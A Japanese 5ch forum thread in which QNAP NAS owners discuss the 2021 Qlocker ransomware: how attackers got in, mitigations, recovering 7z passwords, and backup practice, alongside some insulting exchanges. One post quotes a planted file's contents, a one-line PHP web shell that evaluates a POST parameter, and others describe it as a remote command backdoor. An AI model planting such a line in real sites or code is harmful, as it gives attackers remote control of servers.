【静音・高機能NAS】QNAP part56【自宅サーバ】

**不明なデバイスさん** (ｵｯﾍﾟｹ Srf7-X6xk) · 2021/04/22(木) 15:58:45.35

※次スレは>>970踏んだ方が立てて下さい。立てる時は1行目に !extend:checked:vvvvv:1000:512 をお忘れなく。

静音・高速・高性能なNASサーバ、QNAPのアプライアンス製品のスレ
NASを使う際に気になる点、速度・機能・静音などを高いレベルで満たす数少ない製品です
NASは初めての方から、標準搭載の各種機能が目的の方、データ保全とセキュリティが重要な業務用途、
Linuxベースの自宅サーバが欲しい方まで、幅広いユーザに最適です
QNAPは台湾のメーカーですが、マニュアルからユーティリティまで完全日本語対応です

・オフィシャルサイト： https://www.qnap.com/ja-jp/
QNAP NAS Community Forum　https://forum.qnap.com/
保証情報　https://www.qnap.com/ja-jp/service_ask/
販売/流通ルートは(海外通販や並行輸入品なども含めて)幾つもあります
正規代理店も複数あるので、故障時の手間や保証サポートのことも考えて、好きな流通経路のものを

関連サイト
・QNAP Club Japan　https://www.qnapclub.jp/

関連スレ
NAS総合スレPart31 (LAN接続HDD)
https://mevius.5ch.net/test/read.cgi/hard/1566794151/

前スレ・過去スレ：【静音・高機能NAS】
part49 https://mevius.5ch.net/test/read.cgi/hard/1569008532/
part50 https://mevius.5ch.net/test/read.cgi/hard/1577438170/
part51
https://mevius.5ch.net/test/read.cgi/hard/1583806285/
part52
https://mevius.5ch.net/test/read.cgi/hard/1591197765/
part53
https://mevius.5ch.net/test/read.cgi/hard/1597666162/
【静音・高機能NAS】QNAP part54【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1607608227/
【静音・高機能NAS】QNAP part55【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1615087933/

VIPQ2_EXTDAT: checked:vvvvv:1000:512:: EXT was configured

**不明なデバイスさん** (JP 0Hfd-Cx3h) · 2021/04/23(金) 08:51:29.91

>>80
sshで入ってps auxでもしてみ
変なプロセスが多すぎるとか

**不明なデバイスさん** (ﾜｯﾁｮｲ 0101-xc/R) · 2021/04/23(金) 09:13:04.01

>>79
双子の脆弱性って解説があるみたいやぞ。

ttps://www.vortez.net/news_story/qnap_nas_users_advised_to_urgently_update_malware_remover_due_to_ransomware.html

> More details on the vulnerabilities exploited can be found at QNAP security advisories
> QSA-21-11 (https://qnap.to/3eq7hy) and QSA-21-13 (https://qnap.to/3dygse).

無線ルーターを最近出たQNAPのQHora-301Wに交換して、QNAPのNASを導入しよう
かと思ってたけど、どちらもまだ導入してなくてよかった。

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 09:16:56.86

しかし、疑問なのは、どうやってWAN側からNASまで辿り着いたのか、だよね。この脆弱性を利用するにせよ、NASにはアクセスしないといかんわけで。

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 09:19:54.88

今回のランサムウェアのいま出てる情報を総括して考えると

・UPnPの脆弱性とHBC3にハードコードされたパスワードを利用して侵入している可能性
・ある容量以下のファイルを全て7zに暗号化する
・解凍パスワードは32桁なので総当り解読は無意味
・プロセスが動作中であればパスワードを抜き出せる可能性あり

こんな感じかな？

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 09:22:54.67

>>79
ポート変えてたってのが気になる。
HTTPとか開けてたの？

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 10:06:00.17

>>82
マルチメディア～はうちの環境だと当てはまらない（使ってないしインストールしていない。QTSは3月2日のアップデートが最新）ので、HBS3のハードコートパスの方が拙いと思ってる。

>>85
使おうが使うまいがポート変えるのは基本でしょ？
それはともかくmyqnapcloudで外向きに出してる。
外部公開していない人で当たった人は居ないのでは？

うちの環境から察するに、myqnapcloudでターゲティング（一寸前にadminに対してもの凄い総当たり攻撃があったのはmyqnapcloudでターゲティングしたんだと思ってる）、
HBS3のハードコートパスワードで侵入したんだと思う。

**不明なデバイスさん** (JP 0Hf8-BCZd) · 2021/04/23(金) 10:17:14.84

admin無効関係なし
ポート変更関係なし

現状できる回避策はUPnPのオフとNASをネットワークから隔離することくらい

**不明なデバイスさん** (ﾜｯﾁｮｲ a282-On6t) · 2021/04/23(金) 10:20:59.68

あああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああああ

金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ金返せ

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 10:31:26.42

>>86
ありがとう。
myqnapcloudで当たりをつけてupnpで侵入って感じか。
それだとmy～を使ってない人はほぼセーフってところか。

**不明なデバイスさん** (ﾜｯﾁｮｲ 245f-hzqe) · 2021/04/23(金) 10:52:23.53

新機種買ったので現有機器をローカル限定に切り替えたところだった。
ギリギリセーフw

**不明なデバイスさん** (ﾜｯﾁｮｲ 3868-bceD) · 2021/04/23(金) 10:58:48.59

流れと関係ないけどTS-231Pを4.5.2 Build 20210406に上げたらWebDAVに繋がらなくなった

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 11:00:05.25

とりあえず今回のランサムウェア緊急回避対策

・最新のHBS3に更新
・QNAPの外向きサービスとの紐付け解除
・UPnP停止
・最新のMalware Removerをインストール

出来るならネットワークから切り離してスタンドアロン環境で様子見もあり

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-o8NC) · 2021/04/23(金) 11:01:31.16

7zのパス出させる方法は手遅れだったので
小さいファイルを32桁開始で総当たりする解析スクリプト回し始めた
たぶん無理

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-2tiM) · 2021/04/23(金) 11:48:07.81

うちので外とやり取りあるのはこれだけ。
DDNS noipで更新
NTP nict
L2TP
インバウンドはNAS以外を含めてもL2TPしか通してない。
それ以外はブロードバンドルータで止めてる。
myQNAPはアカウント自体を作ってない。
これなら大丈夫だよな？
昨晩確認した限りではルータにはアメリカとかチェコから1時間に数件のpingがあった程度。
NASにはadminとL2TP用のユーザでのログインログしかなかった。

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:03:43.99

/usr/local/sbin/7z がシェルスクリプトに変更されている

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:13:38.26

>>95
デフォルトだと /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log に
7zのパスワードを保存するようだ、ご注意を

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:21:27.70

攻撃を受けた人って

/root/re.sh
/mnt/ext/opt/apps/backup.php

のファイルがある？

**不明なデバイスさん** (ﾜｯﾁｮｲ 969b-S8++) · 2021/04/23(金) 12:26:36.04

なにがショックってスナップショットが全く役に立たなかったってこと
意味ないじゃん・・・

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 12:27:07.46

>>96
95を見て「それは>>16をやったからでは？」と思ったら16さんだった件

最新のMalware Removerを走らせたらそうなった、とかでもないのかな
7zが書き換えられてログ取るようにされた！QNAPに！的な

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 12:48:42.09

>>99
/usr/local/sbin/7zの更新日付がMalware Removerが動いた時間なので多分そうではないかと

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 13:04:22.83

>>89
upnpはどうなんだろう？本質的にはHBS3に入ってた認証情報が使われた可能性が結構あるというところまでな気がする。
いや疑わしきは罰すの精神でupnp無効はアリと思うけど。

>>92
Malware Remover入れて回したら、「見つかって除去したわ。再起動して」って出るけど、公式は再起動するなと言ってる罠
https://www.qnap.com/ja-jp/news/2021

>>94
今回の件とは別件だけど、adminに対して1日で1000件以上（途中から数えるのを止めた）のブルートフォース攻撃が起こったりしてるから、可能性は低いにしても外向きに構えるならadminは無効にしないと。

>>97
/mnt/ext/opt/apps/backup.phpだけあって、中身は「<?php eval($_POST["cmd"]);?>」のみだったけど、何かあるの？

>>98
スナップショットが消されてこの世の絶望を味わったけど、皮肉にもHBS3のおかげで外付けディスクにバックアップが取れてて地獄と天国を見て、
多重バックアップは必須というのを思い知ったわ。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-0PTu) · 2021/04/23(金) 13:09:45.78

帰ったら俺もNAS確認しよ、月曜日にはHBS3がUSBHDDを上書きしちゃう！

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 13:17:18.52

>>100
「海外フォーラムチェックしながら心配してくれてる人が、やられた？」と
動揺して勝手に16さんだと決め付けてごめんなさい

QNAPの仕業っぽかったら問題なしですね。ログの置き場も置き場だし

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMed-Rk3w) · 2021/04/23(金) 13:56:37.50

>>79
>>64のファイルがスナップショット無効化とphpのエクスプロイトらしい

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 13:57:47.85

>>101
ありがとう。
念のため片方はadmin外してgoogle認証アプリの2要素までセットしたわ。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-9+qx) · 2021/04/23(金) 13:58:07.13

ポート開放、adminの無効化、2要素認証、ポート変更は関係なく、myQNAPcloud経由でアクセスを許可してる人が侵入されるのかな？
myQNAPcloudは繋ぎ方が複数あって、UPnPとnasからqnapに繋ぎに行くcloudlinkとがある。

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 14:08:16.64

これQNAPどう落とし前つけるの？
修正バージョン配ってロックかかった人は残念だったねで終わり？

**不明なデバイスさん** (ｴｱﾍﾟﾗ SD5a-Q9US) · 2021/04/23(金) 14:26:39.45

>>107
ゼロデイだろうからそうじゃないの？

**不明なデバイスさん** (ﾜｯﾁｮｲ fb6e-BqgI) · 2021/04/23(金) 14:39:50.64

使用条件に入ってるだろ
いかなる理由があってもデータの損失に責任を負わないって
これに同意しなければそもそも使えない
どんなソフトでもハードでも同じ

ゼロデイだろうがそうでなかろうが関係ない
バックアップ取るのはユーザーの責任
ガタガタ騒ぐな

**不明なデバイスさん** (ﾜｯﾁｮｲ a45f-On6t) · 2021/04/23(金) 14:57:39.07

windows狙い撃ちのウイルスに感染したってMSがなんか保証するわけじゃないしな

**不明なデバイスさん** (ﾜｯﾁｮｲ d205-Iq6q) · 2021/04/23(金) 15:05:38.37

使用条件にはQNAPを崇め奉らなければQNAPは使えないとは書かれていない

ならばガタガタ騒ぐも開発の無能さを嘆くもユーザーの勝手というわけだから
俺は騒ぐ分には大いに騒いでいいと思うぜ
特にこの件はな

2021/04/23(金) 15:11:13.41

大切なデータは正副予備の3段構えにしとけと

俺は言ってなかったわ(´・ω・`)

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 15:11:36.75

結局のところ、クラウド経由のリモートアクセスみたいな飛び道具は危険って結論だよね。
「絶対」はないから、QNAPに限らず、どんな製品でも言えること。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-HDr5) · 2021/04/23(金) 15:13:19.76

>>80
raid再構築中？

**不明なデバイスさん** (ﾜｯﾁｮｲ 07ca-+ZbI) · 2021/04/23(金) 15:17:16.76

家の玄関を見せれば泥棒は何とかして忍び込もうとするものだ

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 15:20:28.74

取り合えずやることはこれくらかな

1.Malware Removerを最新にしてスキャン
　マルウェア実行中であればパスワードが保存できる
　/share/CACHEDEV1_DATA/.qpkg/MalwareRemover/7z.log
2.すべてのアプリを最新版に更新
3.ルーターのUPnP機能停止

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-X3sy) · 2021/04/23(金) 15:22:42.10

いっそのこともう一回マルウェア実行してくれ…

**不明なデバイスさん** (ｴｱﾍﾟﾗ SD5a-Q9US) · 2021/04/23(金) 15:38:43.01

>>109
それもそうね。

>>117
別のパスワードで二重に圧縮かけられるだけなんじゃ…

**不明なデバイスさん** (ﾜｯﾁｮｲ fb6e-BqgI) · 2021/04/23(金) 15:50:11.63

某巨大ストレージベンダーが脆弱性突かれたとかでなく自分のトコのファームウェアのせいで世界中で企業のデータ完全に吹っ飛ばしたときでさえ使用許諾条件盾に一切保証なし。

しかも同じストレージ使ってバックアップ取ってたトコはバックアップまで全部飛んだというオマケ付き

ハードソフトはそういう世界
見限ってベンダー変えるのも自由

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 16:02:00.24

>>101
/mnt/ext/opt/apps/backup.php が外部からHTTPで
NAS上の任意のコマンドを実行するためのコマンドのようだね

ということは/root/re.shがスナップショットを無効化するためのコマンドかな

/root/r.py も今回の攻撃に関係しているみたい

**不明なデバイスさん** (ｽｯﾌﾟ Sdc4-d95O) · 2021/04/23(金) 16:02:58.24

この件で対策強化されて安全になるやろ

**不明なデバイスさん** (ﾜｯﾁｮｲ c6df-On6t) · 2021/04/23(金) 16:11:22.76

QSnatchで安全になったもんな（棒

**不明なデバイスさん** (ﾜｯﾁｮｲ c2ab-T6Cp) · 2021/04/23(金) 16:54:15.76

>>120
re.shもr.pyも無かったわ・・・。

**不明なデバイスさん** (ﾜｯﾁｮｲ bd10-KIHW) · 2021/04/23(金) 17:04:41.80

なんかスレが進んでいたので見たらゼロデイ攻撃があったのか。
IPoE(MAP-E)+Firewall+NASのIPv6無効+myQNAPCloud未登録なので
影響はないと思うけど、アップデートしておこう。
何やっているか分からないモノを外部に晒すのはちょっと怖いのでNASだけ
IPv6アドレス付与切っておいたけど、今回は正解だったか。

外付けディスクにバックアップしてる人に聞きたいのだけど、
バックアップスケジュールってどうしてる? 手動?
自動スケジュールで外付けディスク繋ぎっぱなしだとランサムウェアの
被害に遭いそうだけど、毎回手動でUSBケーブルを抜き差しするのも面倒そう…

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-BgAO) · 2021/04/23(金) 17:21:08.69

ランサムウェアにやられた後のをバックアップしたら意味がないし、複数世代のバックアップをリモートサイトに取っておくのが一番だよね。

うちは毎日同期しちゃってるからデータ改変には効果がないけど、外付けディスクと実家のNASにコピーしてる。

2021/04/23(金) 18:00:17.02

取引先から被害報告なくてちょっとガッカリ(´・ω・`)

2021/04/23(金) 18:24:44.35

うちは全然被害に遭ってないっぽい
qnapcloud使っててもセーフなケースあり？

**不明なデバイスさん** (ﾌﾞｰｲﾓ MMfd-2tiM) · 2021/04/23(金) 18:30:00.88

>>127
NATとかの正確な構成を教えてほしい

**不明なデバイスさん** (ﾜｯﾁｮｲ 9c4f-Nexr) · 2021/04/23(金) 19:28:09.10

全くわからん！

[/share/CACHEDEV1_DATA/.qpkg/MalwareRemover] # cat 7z.log
/usr/local/sbin/7z.orig
/proc/21060:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0
/usr/local/sbin/7z.orig
/proc/28651:/bin/sh
Uid: 0 0 0 0
/proc/11612:/bin/sh
Uid: 0 0 0 0
/proc/11488:/usr/sbin/sshd
Uid: 0 0 0 0
/proc/32474:/usr/sbin/sshd
Uid: 0 0 0 0

**不明なデバイスさん** (ﾜｯﾁｮｲ 0e02-9+qx) · 2021/04/23(金) 19:43:15.07

https://www.cybersecurity-help.cz/blog/2064.html

QNAPは、攻撃者がCVE-2020-36195(※)の脆弱性を悪用してデバイス上でランサムウェアを実行していると考えていると述べた。

※SQL injection in QNAP Multimedia Console and Media Streaming Add-On

myqnapcloudがあってもセーフなのはマルチメディア系アプリが入ってないという可能性もあるかな

**不明なデバイスさん** (ﾜｯﾁｮｲ 2d07-sKTo) · 2021/04/23(金) 19:45:09.67

うちも被害ないっぽい
マルチメディア系は切ってる

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 19:47:24.45

>>129
暗号化のオプションを指定した場合は /usr/local/sbin/7z.orig の後にパスワードが表示される
> /usr/local/sbin/7z.orig "-p" "password"

2021/04/23(金) 19:58:33.16

>>128
ぶっちゃけあんまり手の込んだ設定はしてないと思う
マルチメディア系も結構使っててQVideoやら大概のやつは入ってる
adminもそのまま、一応長いパスワードではあるけど関係無いんだよね？

ただ、イントラ内だとhttp://nas名ではアクセス不可
nas内にwindowsserver入れてiisとapache同居環境とか
変な事やってる余波で別のipじゃないと管理画面に行かない
lanは5本生えてて全部接続してる

**不明なデバイスさん** (ﾜｯﾁｮｲ 9c4f-Nexr) · 2021/04/23(金) 20:00:38.82

>>132
今日初めてLinuxコマンドなんて打ったもんだから、こんな感じで良いんか分からんす...
Unsupported commandって言われてるから、多分やり方が違うんだろうな

[/usr] # /usr/local/sbin/7z.orig "-p" "password"

7-Zip [32] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,32 bits,4 CPUs LE)

Command Line Error:
Unsupported command:
password

**不明なデバイスさん** (ﾜｯﾁｮｲ b692-0PTu) · 2021/04/23(金) 20:05:09.12

今帰って確認したけど、大丈夫ぽいかな？
マルチメディア系入ってるし、myQnapcloudも動いてる状態。

**不明なデバイスさん** (ﾜｯﾁｮｲ dc3d-Tc22) · 2021/04/23(金) 20:07:48.87

QTSやMalware Removerを最新に更新していたら影響は無かったのでしょうか？

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 20:10:56.49

/usr/local/sbin/7z が元のバイナリに戻っている…

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 20:15:49.46

HBS 3 Hybrid Backup Sync と Malware Remover の更新が来ている
HBS 3 Hybrid Backup Syncの修正内容がかなりヤバそう…

**不明なデバイスさん** (ﾜｯﾁｮｲ 0e02-9+qx) · 2021/04/23(金) 20:37:53.30

修正も手探りなのかね。この感じだと特に必須でないなら、マルチメディア系、HBS3 backup syncは一旦停止させ、バックアップの外付けhddは外しておいた方が安全なのかもね。大丈夫な人もこれから攻撃来るかもしれないわけだし。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-HDr5) · 2021/04/23(金) 20:39:23.48

バックアップなんてローカルでスケジュールでやりたい
だけなんだけどな… このアプリ重厚過ぎ

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-60kV) · 2021/04/23(金) 20:47:08.10

バックアップは簡素で軽いのがいいという人は
rsync を叩くシェルスクリプトを用意して cron で起こすとか

**不明なデバイスさん** (ﾜｯﾁｮｲ 8a68-tA8s) · 2021/04/23(金) 20:49:18.69

大丈夫そうで電源切った
外からのアクセスはしてなくてmyqnapcloudも使ってない
取り敢えずルーターのupnp切って外付けHDD外した、次はOSとHBS3とMalR.のバージョンアップしたら大丈夫なんだろうか

**不明なデバイスさん** (ﾜｯﾁｮｲ 4259-o8NC) · 2021/04/23(金) 20:50:07.20

・シャットダウンした
・ファームとMalware Removerを更新した
・その後7zの暗号が取得できなかった
人に聞きたいんだけど、その後起動したときにHDDの動作音聞こえる？
自分のQNAPがその状況なんだけど起動したときにずっとHDDの動作音してて
何かよからぬものが動いてるはずなんだけど圧縮が進んでるようには見えなくて気味が悪いんだよね

**不明なデバイスさん** (ﾜｯﾁｮｲ 5e63-zK2t) · 2021/04/23(金) 20:55:04.14

>>127
それはあると思うよ。攻撃者も一意の攻撃先に攻撃してる訳じゃないだろし、処理にも時間がかかるからタイムラグがあって当然だし。
攻撃されない(攻撃対象にならない、なれない)ことだってあると思う。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 21:03:03.03

7zやられたー・・・
でも、.Qsyncは無傷だった。
隠しフォルダには手を着けないのかしら。

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 21:05:39.99

とりあえず最低限読んでおいた方がいいもの(すべて正しいとは限らないけど)
https://www.bleepingcomputer.com/forums/t/749247/qlocker-qnap-nas-ransomware-encrypting-with-extension-7z-read-metxt/page-32#entry5171881

**不明なデバイスさん** (ｵｯﾍﾟｹ Sr72-2tiM) · 2021/04/23(金) 21:14:57.83

外からアクセスして確認→無事。
導入時にセキュリティガチガチにしてたのが功を奏したのかな

2021/04/23(金) 21:19:05.84

myqnapcloudからアクセスして確認したら
手持ち3台とも無事だったみたい

**不明なデバイスさん** (ﾜｯﾁｮｲ 3f2d-H1Bl) · 2021/04/23(金) 21:25:19.36

この時期に論理障害が起きてシャットダウンさせたのは、不幸中の幸いだったのかもしれない。

**不明なデバイスさん** (ﾜｯﾁｮｲ 8cbb-Nexr) · 2021/04/23(金) 21:36:38.52

ウチも平気だった。
クラウド系停止して最新Verに全更新完了。ついでに2段階認証も付けた。
IPoE(DS-Lite)+NASのIPv6無効+myQNAPCloud 利用していた。
Admin生きていたけど、前回大騒ぎになっていた1月時点で当時の最新Verに更新していた。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-2tiM) · 2021/04/23(金) 21:37:44.14

パスワード15文字以上あるからadmin使ってても大丈夫だよね？

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 21:47:42.19

頑張っていたこと
admin無効
パスワード13文字(数字、記号込み)
2段階認証使用

反省点
myqnapcloud使っていた
ルータが10年前のNTTのONU
hybrid backup sync 3でクラウドドライブと連携していた
1ヶ月くらいアップデートサボってた。

.Qsyncが無事だったのは不幸中の幸い。そして暗号化されたデータも最近バックアップ取っていたから、被害は少なくて済んだ。
これって、データを詐取されてダークウェブで公開されたりとかしないよね？

2021/04/23(金) 21:49:37.74

>>152
反省するような点では無い気が・・・

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-2tiM) · 2021/04/23(金) 21:56:01.69

myqnapcloudのサーバ側が乗っ取られたわけでもなさそうなのになんでそこが侵入経路になったんだろうか。

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 21:59:01.20

>>153
ありがと

>>154
攻撃対象を効率的に探す手掛かりにしたんじゃないかなあ

**不明なデバイスさん** (ﾜｯﾁｮｲ df36-BZjc) · 2021/04/23(金) 22:02:19.48

myQNAPcloudはデフォルトではインターネット公開されて
myQNAPcloudユーザであればだれでも検索できるらしいから

**不明なデバイスさん** (ﾜｯﾁｮｲ dcad-sVZV) · 2021/04/23(金) 22:10:12.25

myqnapcloudのサイトで検索できるしくみもあるんだけど
文字列生成して 53/udp というのが

**不明なデバイスさん** (ﾜｯﾁｮｲ ba7c-xYSY) · 2021/04/23(金) 22:12:14.06

>>155
俺はHDDトラブルでQnapを3週間ほど止めていたから助かったけど>>152とほぼ同じ状況だった
正式に原因が分からないと再稼働できないよ

**不明なデバイスさん** (ﾜｯﾁｮｲ 8a3d-2tiM) · 2021/04/23(金) 22:26:20.22

>>152のテンプレ少し改良してみた
■被害＝無し

※認証関係
admin 有効
パスワード　15文字(数字、記号込み)
2段階認証　使ってない

※NW関係
myqnapcloud 未登録&未稼働
VPN利用　L2TP
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他　NAT通過はVPNのみ

※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ有効
ssh 有効
OS 4.3.3 build 20180504

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 22:47:35.37

>>159
乗っかってみる

■被害＝蟻

※認証関係
admin 無効
パスワード　13文字(数字、記号込み)
2段階認証　使っている

※NW関係
myqnapcloud　稼働中
VPN利用　L2TP
ルータ 10年前のNTTのONU
その他　NAT通過はVPNのみ

※サービス関係
hybrid backup sync　クラウドドライブと同期
media streaming addon 無効
webサーバ無効
ssh 無効
OS build　電源切っちゃったし、再投入もしたくないので不明

>>159との違いで怪しいのはmyqnapcloudとhybrid backup syncってことなのかなあ。正直、初めはなぜ侵入されたのか理解できなくて心底恐怖だった。手持ちのPCやスマートフォンが全て侵入経路に見えて、全部電源切って触れなかったもん。今になってみると、やはりQNAP NAS(とそのソフトウェア)そのものの脆弱性に漬け込んだ攻撃だったんだろうなと、信じつつある。

**不明なデバイスさん** (ﾜｯﾁｮｲ d48e-iMGS) · 2021/04/23(金) 22:57:12.81

>>152
ルータが10年前のNTTのONU

って何？わからんではないけど。
この程度の知識レベルの人が公開してはいけない時代。

**不明なデバイスさん** (ﾜｯﾁｮｲ 7001-On6t) · 2021/04/23(金) 23:00:23.07

>>161
は？
免許制とか許可制にするのかよｗ

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 23:02:37.80

>>161
返す言葉もないけど、ONUなんてそう気軽に交換できるものでも無いわけですよ

**不明なデバイスさん** (ﾜｯﾁｮｲ 6e49-On6t) · 2021/04/23(金) 23:06:10.52

まぁホームゲートウェイのことだとは思う

**不明なデバイスさん** (ﾜｯﾁｮｲ 2e22-1bRV) · 2021/04/23(金) 23:10:03.42

んじゃ自分もとりあえず報告しとく。
■被害＝無し

※認証関係
admin 無効
HTTPSのみ有効
P/W　それなりに複雑
2段階認証　有効
OpenSSL+証明書インストール済み

※NW関係
NASサービス　公開なし
システムポート　変更済み
ネットワークアクセス保護　「1分間」「5回」「期限なし」
myQNAPcloud　登録済み（アクセス制御は「カスタマイズ済み」だが未稼働。
myQNAPcloud Link　未インストール
VPN利用　OpenVPN
ルータ　HG8045Q(NURO)、UPnPは無効
MyDDNS　有効
その他　NAT通過はVPN、P2P等

※サービス関係
QuFirewall（設定厳しめ）＋Malware Remover 稼働中
HBS 3　ローカル＆クラウドバックアップで利用
media streaming addon　有効
マルチメディアサービス　有効
ssh　無効
OS 4.5.2.1630 build 20210406（5日ほど前にアップデートした）

大体こんなとこ。

**不明なデバイスさん** (ﾜｯﾁｮｲ d48e-iMGS) · 2021/04/23(金) 23:12:37.93

言い方は悪いが、今回のことは紛争地帯にノコノコ出掛けていって誘拐されて助けを求めるのと変わらない。
>>162みたいな論点すり替えの頭の悪いやつが出てくるのも同じ構図。
ここ数年で攻撃する方の手口も複雑になった。
そんなこともわからず、そもそもONUとルーターの違いすらわからんようでは話しにならない。
感染させられたことには同情するけど、危険性を理解した上で使えってこと。

**不明なデバイスさん** (ﾜｯﾁｮｲ 6e49-On6t) · 2021/04/23(金) 23:12:43.99

■被害＝無し

※認証関係
admin 有効
パスワード　40桁程度文字(英数字、記号)
2段階認証　なし

※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス　なし
アクセスコントロール　プライベート
VPN
ルータ 10年前のbuffuo無線LANルータ
DDNS ランダム英数字
その他　NAT通過はVPNのみ

※サービス関係
hybrid backup sync ローカルのみ利用
media streaming addon 有効
webサーバ有効
ssh 有効
OS 4.3.3 build 20180504

**不明なデバイスさん** (ﾜｯﾁｮｲ d48e-iMGS) · 2021/04/23(金) 23:13:48.24

>>163
まだわからんのか
頭悪過ぎと思う

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-5CYL) · 2021/04/23(金) 23:16:51.95

>>166
>ONUとルーターの違いすらわからんようでは話しにならない。

言葉足らずだったけど、ルーター機能が内蔵されたONUって結構一般的だよ。

**不明なデバイスさん** (ﾜｯﾁｮｲ e75f-12fG) · 2021/04/23(金) 23:18:16.99

とりあえず被害なかった
本体とアプリ更新してadmin無効確認、myqnapcloudをプライベートにしてログインに二段階認証入れた
これでとりあえずかな

**不明なデバイスさん** (ﾜｯﾁｮｲ 6e49-On6t) · 2021/04/23(金) 23:19:59.86

■被害＝無し

※認証関係
admin 有効
パスワード　40桁程度文字(英数字、記号)
2段階認証　なし

※NW関係
myQNAPcloud 登録
myQNAPcloud Link off
公開サービス　なし
アクセスコントロール　プライベート
VPN　OpenVPN
DDNS myqnapcloud
NAT https, OpenVPN
ルータ/UPnP 有効
NAS/UpnP 有効ただし登録サービスなし

※サービス関係
HBS 3 利用
media streaming addon 無効
QuFirewall 利用
webサーバ有効
ssh 無効
OS 4.5.2.1630

2か所でNASを設置しているけどUPnPの有効無効以外は同じ。どちらも被害なし。
てっきりoffだと思っていたけど今回の騒ぎで慌てて確認して切った。
おそらくmyQNAPcloudの設定とHBS3の合わせ技でやられたんだろうな

**不明なデバイスさん** (ﾌﾞｰｲﾓ MM5e-60kV) · 2021/04/23(金) 23:21:34.52

HGWと呼ばれるブツのことなのはたぶんみんなわかってる

**不明なデバイスさん** (ﾜｯﾁｮｲ d48e-iMGS) · 2021/04/23(金) 23:22:13.27

>>169
後付けの言い訳やめろよ
ONUはONU。ルーターはルーター。
NTTには単体のONUとか単体のルーターがないとでもいうのか？
書くならONU内蔵のルーター、型番○○だ。
だから頭が悪いと指摘している。

